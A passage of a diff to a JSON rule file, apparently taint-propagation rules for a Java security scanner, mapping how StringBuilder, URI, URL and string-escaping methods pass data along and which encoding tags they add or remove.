"value": "java.io.CharArrayWriter.write(java.lang.String,int,int)" }, { - "command": "INSERT(P1)", + "command": "APPEND()", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "language": 1, - "source": "P2", + "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], @@ -2535,35 +2561,35 @@ "track": "false", "type": 1, "untags": [], - "value": "java.lang.StringBuilder.insert(int,char)" + "value": "java.lang.AbstractStringBuilder.append(java.lang.String)" }, { - "command": "INSERT(P1)", + "command": "SUBSET(P1,P2,P4)", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "language": 1, - "source": "P2", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "O", + "target": "P3", "track": "false", "type": 1, "untags": [], - "value": "java.lang.StringBuilder.insert(int,char[])" + "value": "java.lang.AbstractStringBuilder.getChars(int,int,char[],int)" }, { - "command": "INSERT(P1,P3,P4)", + "command": "SUBSET(0,P1)", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "language": 1, - "source": "P2", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], @@ -2571,211 +2597,197 @@ "track": "false", "type": 1, "untags": [], - "value": "java.lang.StringBuilder.insert(int,char[],int,int)" + "value": "java.lang.AbstractStringBuilder.setLength(int)" }, { - "command": "INSERT(P1)", + "command": "SUBSET(P1)", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "language": 1, - "source": "P2", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "O", + "target": "R", "track": "false", "type": 1, "untags": [], - "value": "java.lang.StringBuilder.insert(int,java.lang.CharSequence)" + "value": "java.lang.AbstractStringBuilder.substring(int)" }, { - "command": "INSERT(P1,P3,P4)", + "command": "SUBSET(P1,P2)", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "language": 1, - "source": "P2", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "O", + "target": "R", "track": "false", "type": 1, "untags": [], - "value": "java.lang.StringBuilder.insert(int,java.lang.CharSequence,int,int)" + "value": "java.lang.AbstractStringBuilder.substring(int,int)" }, { - "command": "INSERT(P1)", + "command": "KEEP()", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "language": 1, - "source": "P2", + "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "O", - "track": "false", + "track": "", "type": 1, "untags": [], - "value": "java.lang.StringBuilder.insert(int,java.lang.String)" + "value": "java.lang.StringBuilder.(java.lang.CharSequence)" }, { - "command": "REPLACE(P1,P2)", + "command": "KEEP()", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "language": 1, - "source": "O|P3", + "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "O", - "track": "false", + "track": "", "type": 1, "untags": [], - "value": "java.lang.StringBuilder.replace(int,int,java.lang.String)" + "value": "java.lang.StringBuilder.(java.lang.String)" }, { - "command": "SUBSET(0,P1)", + "command": "APPEND(P2,P3,0)", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "language": 1, - "source": "O", + "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "O", - "track": "false", + "track": "", "type": 1, "untags": [], - "value": "java.lang.StringBuilder.setLength(int)" + "value": "java.lang.StringBuilder.append(char[],int,int)" }, { - "command": "SUBSET(P1)", + "command": "APPEND()", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "language": 1, - "source": "O", + "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "R", - "track": "false", + "target": "O", + "track": "", "type": 1, "untags": [], - "value": "java.lang.StringBuilder.substring(int)" + "value": "java.lang.StringBuilder.append(java.lang.CharSequence)" }, { - "command": "SUBSET(P1,P2)", + "command": "APPEND(P2,P3)", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "language": 1, - "source": "O", + "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "R", - "track": "false", + "target": "O", + "track": "", "type": 1, "untags": [], - "value": "java.lang.StringBuilder.substring(int,int)" + "value": "java.lang.StringBuilder.append(java.lang.CharSequence,int,int)" }, { - "command": "SUBSET(P1,P2)", + "command": "", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "language": 1, - "source": "O", + "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "R", - "track": "false", + "target": "O", + "track": "", "type": 1, "untags": [], - "value": "java.lang.StringBuilder.substring(int,int)" + "value": "java.lang.StringBuilder.append(java.lang.Object)" }, { - "command": "KEEP()", + "command": "APPEND()", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "language": 1, - "source": "O", + "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "R", + "target": "O", "track": "", "type": 1, "untags": [], - "value": "java.lang.StringBuilder.toString()" - } - ], - "enable": 1, - "type": 1, - "value": "StringBuilder" - }, - { - "details": [ + "value": "java.lang.StringBuilder.append(java.lang.String)" + }, { - "command": "", + "command": "APPEND()", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "language": 1, "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "R", - "track": "false", - "type": 2, + "target": "O", + "track": "", + "type": 1, "untags": [], - "value": "org.apache.struts2.dispatcher.multipart.MultiPartRequest.getParameterValues(java.lang.String)" - } - ], - "enable": 1, - "type": 2, - "value": "Struts2" - }, - { - "details": [ + "value": "java.lang.StringBuilder.append(java.lang.StringBuffer)" + }, { - "command": "", + "command": "REMOVE(P1,P2)", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], @@ -2783,17 +2795,17 @@ "track": "false", "type": 1, "untags": [], - "value": "java.net.URI.(java.lang.String)" + "value": "java.lang.StringBuilder.delete(int,int)" }, { - "command": "", + "command": "REMOVE(P1)", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "language": 1, - "source": "P1,2,3", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], @@ -2801,35 +2813,35 @@ "track": "false", "type": 1, "untags": [], - "value": "java.net.URI.(java.lang.String,java.lang.String,java.lang.String)" + "value": "java.lang.StringBuilder.deleteCharAt(int)" }, { - "command": "", + "command": "SUBSET(P1,P2,P4)", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "language": 1, - "source": "P1,2,3,5,6,7", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "O", + "target": "P3", "track": "false", "type": 1, "untags": [], - "value": "java.net.URI.(java.lang.String,java.lang.String,java.lang.String,int,java.lang.String,java.lang.String,java.lang.String)" + "value": "java.lang.StringBuilder.getChars(int,int,char[],int)" }, { - "command": "", + "command": "INSERT(P1)", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "language": 1, - "source": "P1,2,3,4,5", + "source": "P2", "stack_blacklist": [], "system_type": 1, "tags": [], @@ -2837,42 +2849,35 @@ "track": "false", "type": 1, "untags": [], - "value": "java.net.URI.(java.lang.String,java.lang.String,java.lang.String,java.lang.String,java.lang.String)" + "value": "java.lang.StringBuilder.insert(int,char)" }, { - "command": "", + "command": "INSERT(P1)", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "language": 1, - "source": "O", + "source": "P2", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "R", + "target": "O", "track": "false", "type": 1, "untags": [], - "value": "java.net.URI.toURL()" - } - ], - "enable": 1, - "type": 1, - "value": "URI" - }, - { - "details": [ + "value": "java.lang.StringBuilder.insert(int,char[])" + }, { - "command": "", + "command": "INSERT(P1,P3,P4)", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "language": 1, - "source": "P1,2,4", + "source": "P2", "stack_blacklist": [], "system_type": 1, "tags": [], @@ -2880,17 +2885,17 @@ "track": "false", "type": 1, "untags": [], - "value": "java.net.URL.(java.lang.String,java.lang.String,int,java.lang.String,java.net.URLStreamHandler)" + "value": "java.lang.StringBuilder.insert(int,char[],int,int)" }, { - "command": "", + "command": "INSERT(P1)", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "language": 1, - "source": "P1,2", + "source": "P2", "stack_blacklist": [], "system_type": 1, "tags": [], @@ -2898,185 +2903,151 @@ "track": "false", "type": 1, "untags": [], - "value": "java.net.URL.(java.net.URL,java.lang.String,java.net.URLStreamHandler)" + "value": "java.lang.StringBuilder.insert(int,java.lang.CharSequence)" }, { - "command": "", + "command": "INSERT(P1,P3,P4)", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "language": 1, - "source": "P1", + "source": "P2", "stack_blacklist": [], "system_type": 1, - "tags": [ - "url-decoded" - ], - "target": "R", + "tags": [], + "target": "O", "track": "false", "type": 1, - "untags": [ - "url-encoded", - "xss-encoded" - ], - "value": "java.net.URLDecoder.decode(java.lang.String,java.lang.String)" + "untags": [], + "value": "java.lang.StringBuilder.insert(int,java.lang.CharSequence,int,int)" }, { - "command": "", + "command": "INSERT(P1)", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "language": 1, - "source": "P1", + "source": "P2", "stack_blacklist": [], "system_type": 1, - "tags": [ - "url-decoded" - ], - "target": "R", + "tags": [], + "target": "O", "track": "false", "type": 1, - "untags": [ - "url-encoded", - "xss-encoded" - ], - "value": "java.net.URLDecoder.decode(java.lang.String,java.nio.charset.Charset)" + "untags": [], + "value": "java.lang.StringBuilder.insert(int,java.lang.String)" }, { - "command": "", + "command": "REPLACE(P1,P2)", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "language": 1, - "source": "P1", + "source": "O|P3", "stack_blacklist": [], "system_type": 1, - "tags": [ - "url-encoded" - ], - "target": "R", + "tags": [], + "target": "O", "track": "false", "type": 1, - "untags": [ - "url-decoded" - ], - "value": "java.net.URLEncoder.encode(java.lang.String,java.lang.String)" + "untags": [], + "value": "java.lang.StringBuilder.replace(int,int,java.lang.String)" }, { - "command": "", + "command": "SUBSET(0,P1)", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, - "tags": [ - "url-encoded" - ], - "target": "R", + "tags": [], + "target": "O", "track": "false", "type": 1, - "untags": [ - "url-decoded" - ], - "value": "java.net.URLEncoder.encode(java.lang.String,java.nio.charset.Charset)" + "untags": [], + "value": "java.lang.StringBuilder.setLength(int)" }, { - "command": "", + "command": "SUBSET(P1)", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, - "tags": [ - "url-encoded" - ], + "tags": [], "target": "R", "track": "false", "type": 1, - "untags": [ - "url-decoded" - ], - "value": "javax.servlet.http.HttpServletResponse.encodeRedirectURL(java.lang.String)" + "untags": [], + "value": "java.lang.StringBuilder.substring(int)" }, { - "command": "", + "command": "SUBSET(P1,P2)", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, - "tags": [ - "url-encoded" - ], + "tags": [], "target": "R", "track": "false", "type": 1, - "untags": [ - "url-decoded" - ], - "value": "javax.servlet.http.HttpServletResponse.encodeRedirectUrl(java.lang.String)" + "untags": [], + "value": "java.lang.StringBuilder.substring(int,int)" }, { - "command": "", + "command": "SUBSET(P1,P2)", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, - "tags": [ - "url-encoded" - ], + "tags": [], "target": "R", "track": "false", "type": 1, - "untags": [ - "url-decoded" - ], - "value": "javax.servlet.http.HttpServletResponse.encodeURL(java.lang.String)" + "untags": [], + "value": "java.lang.StringBuilder.substring(int,int)" }, { - "command": "", + "command": "KEEP()", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, - "tags": [ - "url-encoded" - ], + "tags": [], "target": "R", - "track": "false", + "track": "", "type": 1, - "untags": [ - "url-decoded" - ], - "value": "javax.servlet.http.HttpServletResponse.encodeUrl(java.lang.String)" + "untags": [], + "value": "java.lang.StringBuilder.toString()" }, { "command": "", @@ -3086,27 +3057,16 @@ "ignore_internal": false, "inherit": "false", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, - "tags": [ - "url-encoded" - ], + "tags": [], "target": "R", "track": "false", "type": 1, - "untags": [ - "url-decoded" - ], - "value": "org.apache.catalina.util.URLEncoder.encode(java.lang.String)" - } - ], - "enable": 1, - "type": 1, - "value": "URL" - }, - { - "details": [ + "untags": [], + "value": "java.lang.StringTokenizer.nextElement()" + }, { "command": "", "created_by": 1, @@ -3115,19 +3075,15 @@ "ignore_internal": false, "inherit": "false", "language": 1, - "source": "P2", + "source": "O", "stack_blacklist": [], "system_type": 1, - "tags": [ - "html-encoded" - ], - "target": "P1", + "tags": [], + "target": "R", "track": "false", "type": 1, - "untags": [ - "html-decoded" - ], - "value": "org.apache.commons.lang.StringEscapeUtils.escapeHtml(java.io.Writer,java.lang.String)" + "untags": [], + "value": "java.lang.StringTokenizer.nextToken()" }, { "command": "", @@ -3140,16 +3096,12 @@ "source": "P1", "stack_blacklist": [], "system_type": 1, - "tags": [ - "html-encoded" - ], + "tags": [], "target": "R", - "track": "", + "track": "false", "type": 1, - "untags": [ - "html-decoded" - ], - "value": "org.apache.commons.lang.StringEscapeUtils.escapeHtml(java.lang.String)" + "untags": [], + "value": "java.net.IDN.toASCII(java.lang.String,int)" }, { "command": "", @@ -3159,19 +3111,15 @@ "ignore_internal": false, "inherit": "false", "language": 1, - "source": "P2", + "source": "P1", "stack_blacklist": [], "system_type": 1, - "tags": [ - "xss-encoded" - ], - "target": "P1", + "tags": [], + "target": "R", "track": "false", "type": 1, - "untags": [ - "xml-decoded" - ], - "value": "org.apache.commons.lang.StringEscapeUtils.escapeXml(java.io.Writer,java.lang.String)" + "untags": [], + "value": "java.net.IDN.toUnicode(java.lang.String,int)" }, { "command": "", @@ -3184,16 +3132,12 @@ "source": "P1", "stack_blacklist": [], "system_type": 1, - "tags": [ - "xml-encoded" - ], + "tags": [], "target": "R", "track": "false", "type": 1, - "untags": [ - "xml-decoded" - ], - "value": "org.apache.commons.lang.StringEscapeUtils.escapeXml(java.lang.String)" + "untags": [], + "value": "java.nio.channels.Channels.newChannel(java.io.InputStream)" }, { "command": "", @@ -3203,19 +3147,15 @@ "ignore_internal": false, "inherit": "false", "language": 1, - "source": "P2", + "source": "O", "stack_blacklist": [], "system_type": 1, - "tags": [ - "html-decoded" - ], + "tags": [], "target": "P1", "track": "false", "type": 1, - "untags": [ - "html-encoded" - ], - "value": "org.apache.commons.lang.StringEscapeUtils.unescapeHtml(java.io.Writer,java.lang.String)" + "untags": [], + "value": "java.nio.channels.ReadableByteChannel.read(java.nio.ByteBuffer)" }, { "command": "", @@ -3225,19 +3165,15 @@ "ignore_internal": false, "inherit": "false", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, - "tags": [ - "html-decoded" - ], - "target": "R", + "tags": [], + "target": "P1", "track": "false", "type": 1, - "untags": [ - "html-encoded" - ], - "value": "org.apache.commons.lang.StringEscapeUtils.unescapeHtml(java.lang.String)" + "untags": [], + "value": "java.security.SecureRandom.nextBytes(byte[])" }, { "command": "", @@ -3247,19 +3183,15 @@ "ignore_internal": false, "inherit": "false", "language": 1, - "source": "P2", + "source": "P1", "stack_blacklist": [], "system_type": 1, - "tags": [ - "xml-decoded" - ], - "target": "P1", + "tags": [], + "target": "O", "track": "false", "type": 1, - "untags": [ - "xml-encoded" - ], - "value": "org.apache.commons.lang.StringEscapeUtils.unescapeXml(java.io.Writer,java.lang.String)" + "untags": [], + "value": "java.util.StringTokenizer.(java.lang.String)" }, { "command": "", @@ -3272,16 +3204,12 @@ "source": "P1", "stack_blacklist": [], "system_type": 1, - "tags": [ - "xml-decoded" - ], - "target": "R", + "tags": [], + "target": "O", "track": "false", "type": 1, - "untags": [ - "xml-encoded" - ], - "value": "org.apache.commons.lang.StringEscapeUtils.unescapeXml(java.lang.String)" + "untags": [], + "value": "java.util.StringTokenizer.(java.lang.String,java.lang.String)" }, { "command": "", @@ -3294,19 +3222,51 @@ "source": "P1", "stack_blacklist": [], "system_type": 1, - "tags": [ - "html-encoded" - ], + "tags": [], + "target": "O", + "track": "false", + "type": 1, + "untags": [], + "value": "java.util.StringTokenizer.(java.lang.String,java.lang.String,boolean)" + }, + { + "command": "KEEP()", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P2", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "O", + "track": "false", + "type": 1, + "untags": [], + "value": "java.util.logging.LogRecord.(java.util.logging.Level,java.lang.String)" + }, + { + "command": "KEEP()", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "O", + "stack_blacklist": [], + "system_type": 1, + "tags": [], "target": "R", "track": "false", "type": 1, - "untags": [ - "html-decoded" - ], - "value": "org.apache.commons.lang3.StringEscapeUtils.escapeHtml3(java.lang.String)" + "untags": [], + "value": "java.util.logging.LogRecord.getMessage()" }, { - "command": "", + "command": "KEEP()", "created_by": 1, "enable": 1, "ignore_blacklist": false, @@ -3316,16 +3276,12 @@ "source": "P1", "stack_blacklist": [], "system_type": 1, - "tags": [ - "html-encoded" - ], - "target": "R", + "tags": [], + "target": "O", "track": "false", "type": 1, - "untags": [ - "html-decoded" - ], - "value": "org.apache.commons.lang3.StringEscapeUtils.escapeHtml4(java.lang.String)" + "untags": [], + "value": "java.util.logging.LogRecord.setMessage(java.lang.String)" }, { "command": "", @@ -3339,15 +3295,15 @@ "stack_blacklist": [], "system_type": 1, "tags": [ - "xml-encoded" + "html-encoded" ], "target": "R", "track": "false", "type": 1, "untags": [ - "xml-decoded" + "html-decoded" ], - "value": "org.apache.commons.lang3.StringEscapeUtils.escapeXml(java.lang.String)" + "value": "nu.xom.Attribute.escapeText(java.lang.String)" }, { "command": "", @@ -3360,16 +3316,12 @@ "source": "P1", "stack_blacklist": [], "system_type": 1, - "tags": [ - "xml-encoded" - ], + "tags": [], "target": "R", "track": "false", "type": 1, - "untags": [ - "xml-decoded" - ], - "value": "org.apache.commons.lang3.StringEscapeUtils.escapeXml10(java.lang.String)" + "untags": [], + "value": "org.apache.catalina.connector.Request.unescape(java.lang.String)" }, { "command": "", @@ -3383,15 +3335,15 @@ "stack_blacklist": [], "system_type": 1, "tags": [ - "xml-encoded" + "html-encoded" ], "target": "R", "track": "false", "type": 1, "untags": [ - "xml-decoded" + "html-decoded" ], - "value": "org.apache.commons.lang3.StringEscapeUtils.escapeXml11(java.lang.String)" + "value": "org.apache.commons.lang.StringEscapeUtils.escapeJavaScript(java.lang.String)" }, { "command": "", @@ -3405,15 +3357,15 @@ "stack_blacklist": [], "system_type": 1, "tags": [ - "html-decoded" + "sql-encoded" ], "target": "R", "track": "false", "type": 1, "untags": [ - "html-encoded" + "sql-decoded" ], - "value": "org.apache.commons.lang3.StringEscapeUtils.unescapeHtml3(java.lang.String)" + "value": "org.apache.commons.lang.StringEscapeUtils.escapeSQL(java.lang.String)" }, { "command": "", @@ -3435,7 +3387,7 @@ "untags": [ "html-encoded" ], - "value": "org.apache.commons.lang3.StringEscapeUtils.unescapeHtml4(java.lang.String)" + "value": "org.apache.commons.lang.StringEscapeUtils.unescapeJavaScript(java.lang.String)" }, { "command": "", @@ -3448,16 +3400,12 @@ "source": "P1", "stack_blacklist": [], "system_type": 1, - "tags": [ - "xml-decoded" - ], + "tags": [], "target": "R", "track": "false", "type": 1, - "untags": [ - "xml-encoded" - ], - "value": "org.apache.commons.lang3.StringEscapeUtils.unescapeXml(java.lang.String)" + "untags": [], + "value": "org.apache.commons.lang3.StringEscapeUtils.escapeEcmaScript(java.lang.String)" }, { "command": "", @@ -3467,24 +3415,45 @@ "ignore_internal": false, "inherit": "false", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, - "tags": [ - "xml-encoded" - ], + "tags": [], "target": "R", "track": "false", "type": 1, - "untags": [ - "xml-decoded" - ], - "value": "org.apache.taglibs.standard.tag.common.core.Util.escapeXml(java.lang.String)" + "untags": [], + "value": "sun.net.www.protocol.http.HttpURLConnection.getInputStream()" } ], "enable": 1, "type": 1, - "value": "apache-filter" + "value": "StringBuilder" + }, + { + "details": [ + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 2, + "untags": [], + "value": "org.apache.struts2.dispatcher.multipart.MultiPartRequest.getParameterValues(java.lang.String)" + } + ], + "enable": 1, + "type": 2, + "value": "Struts2" }, { "details": [ @@ -3494,17 +3463,1828 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "O", + "track": "false", + "type": 1, + "untags": [], + "value": "java.net.URI.(java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1,2,3", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "O", + "track": "false", + "type": 1, + "untags": [], + "value": "java.net.URI.(java.lang.String,java.lang.String,java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1,2,3,5,6,7", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "O", + "track": "false", + "type": 1, + "untags": [], + "value": "java.net.URI.(java.lang.String,java.lang.String,java.lang.String,int,java.lang.String,java.lang.String,java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1,2,3,4", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 1, + "untags": [], + "value": "java.net.URI.(java.lang.String,java.lang.String,java.lang.String,java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1,2,3,4,5", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "O", + "track": "false", + "type": 1, + "untags": [], + "value": "java.net.URI.(java.lang.String,java.lang.String,java.lang.String,java.lang.String,java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "O", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 1, + "untags": [], + "value": "java.net.URI.toURL()" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 1, + "untags": [], + "value": "java.nio.file.spi.FileSystemProvider.getPath(java.net.URI)" + } + ], + "enable": 1, + "type": 1, + "value": "URI" + }, + { + "details": [ + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1,2,4", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "O", + "track": "false", + "type": 1, + "untags": [], + "value": "java.net.URL.(java.lang.String,java.lang.String,int,java.lang.String,java.net.URLStreamHandler)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1,2", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "O", + "track": "false", + "type": 1, + "untags": [], + "value": "java.net.URL.(java.net.URL,java.lang.String,java.net.URLStreamHandler)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [ + "url-decoded" + ], + "target": "R", + "track": "false", + "type": 1, + "untags": [ + "url-encoded", + "xss-encoded" + ], + "value": "java.net.URLDecoder.decode(java.lang.String,java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [ + "url-decoded" + ], + "target": "R", + "track": "false", + "type": 1, + "untags": [ + "url-encoded", + "xss-encoded" + ], + "value": "java.net.URLDecoder.decode(java.lang.String,java.nio.charset.Charset)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [ + "url-encoded" + ], + "target": "R", + "track": "false", + "type": 1, + "untags": [ + "url-decoded" + ], + "value": "java.net.URLEncoder.encode(java.lang.String,java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [ + "url-encoded" + ], + "target": "R", + "track": "false", + "type": 1, + "untags": [ + "url-decoded" + ], + "value": "java.net.URLEncoder.encode(java.lang.String,java.nio.charset.Charset)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [ + "url-encoded" + ], + "target": "R", + "track": "false", + "type": 1, + "untags": [ + "url-decoded" + ], + "value": "javax.servlet.http.HttpServletResponse.encodeRedirectURL(java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [ + "url-encoded" + ], + "target": "R", + "track": "false", + "type": 1, + "untags": [ + "url-decoded" + ], + "value": "javax.servlet.http.HttpServletResponse.encodeRedirectUrl(java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [ + "url-encoded" + ], + "target": "R", + "track": "false", + "type": 1, + "untags": [ + "url-decoded" + ], + "value": "javax.servlet.http.HttpServletResponse.encodeURL(java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [ + "url-encoded" + ], + "target": "R", + "track": "false", + "type": 1, + "untags": [ + "url-decoded" + ], + "value": "javax.servlet.http.HttpServletResponse.encodeUrl(java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [ + "url-encoded" + ], + "target": "R", + "track": "false", + "type": 1, + "untags": [ + "url-decoded" + ], + "value": "org.apache.catalina.util.URLEncoder.encode(java.lang.String)" + } + ], + "enable": 1, + "type": 1, + "value": "URL" + }, + { + "details": [ + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P2", + "stack_blacklist": [], + "system_type": 1, + "tags": [ + "html-encoded" + ], + "target": "P1", + "track": "false", + "type": 1, + "untags": [ + "html-decoded" + ], + "value": "org.apache.commons.lang.StringEscapeUtils.escapeHtml(java.io.Writer,java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [ + "html-encoded" + ], + "target": "R", + "track": "", + "type": 1, + "untags": [ + "html-decoded" + ], + "value": "org.apache.commons.lang.StringEscapeUtils.escapeHtml(java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P2", + "stack_blacklist": [], + "system_type": 1, + "tags": [ + "xss-encoded" + ], + "target": "P1", + "track": "false", + "type": 1, + "untags": [ + "xml-decoded" + ], + "value": 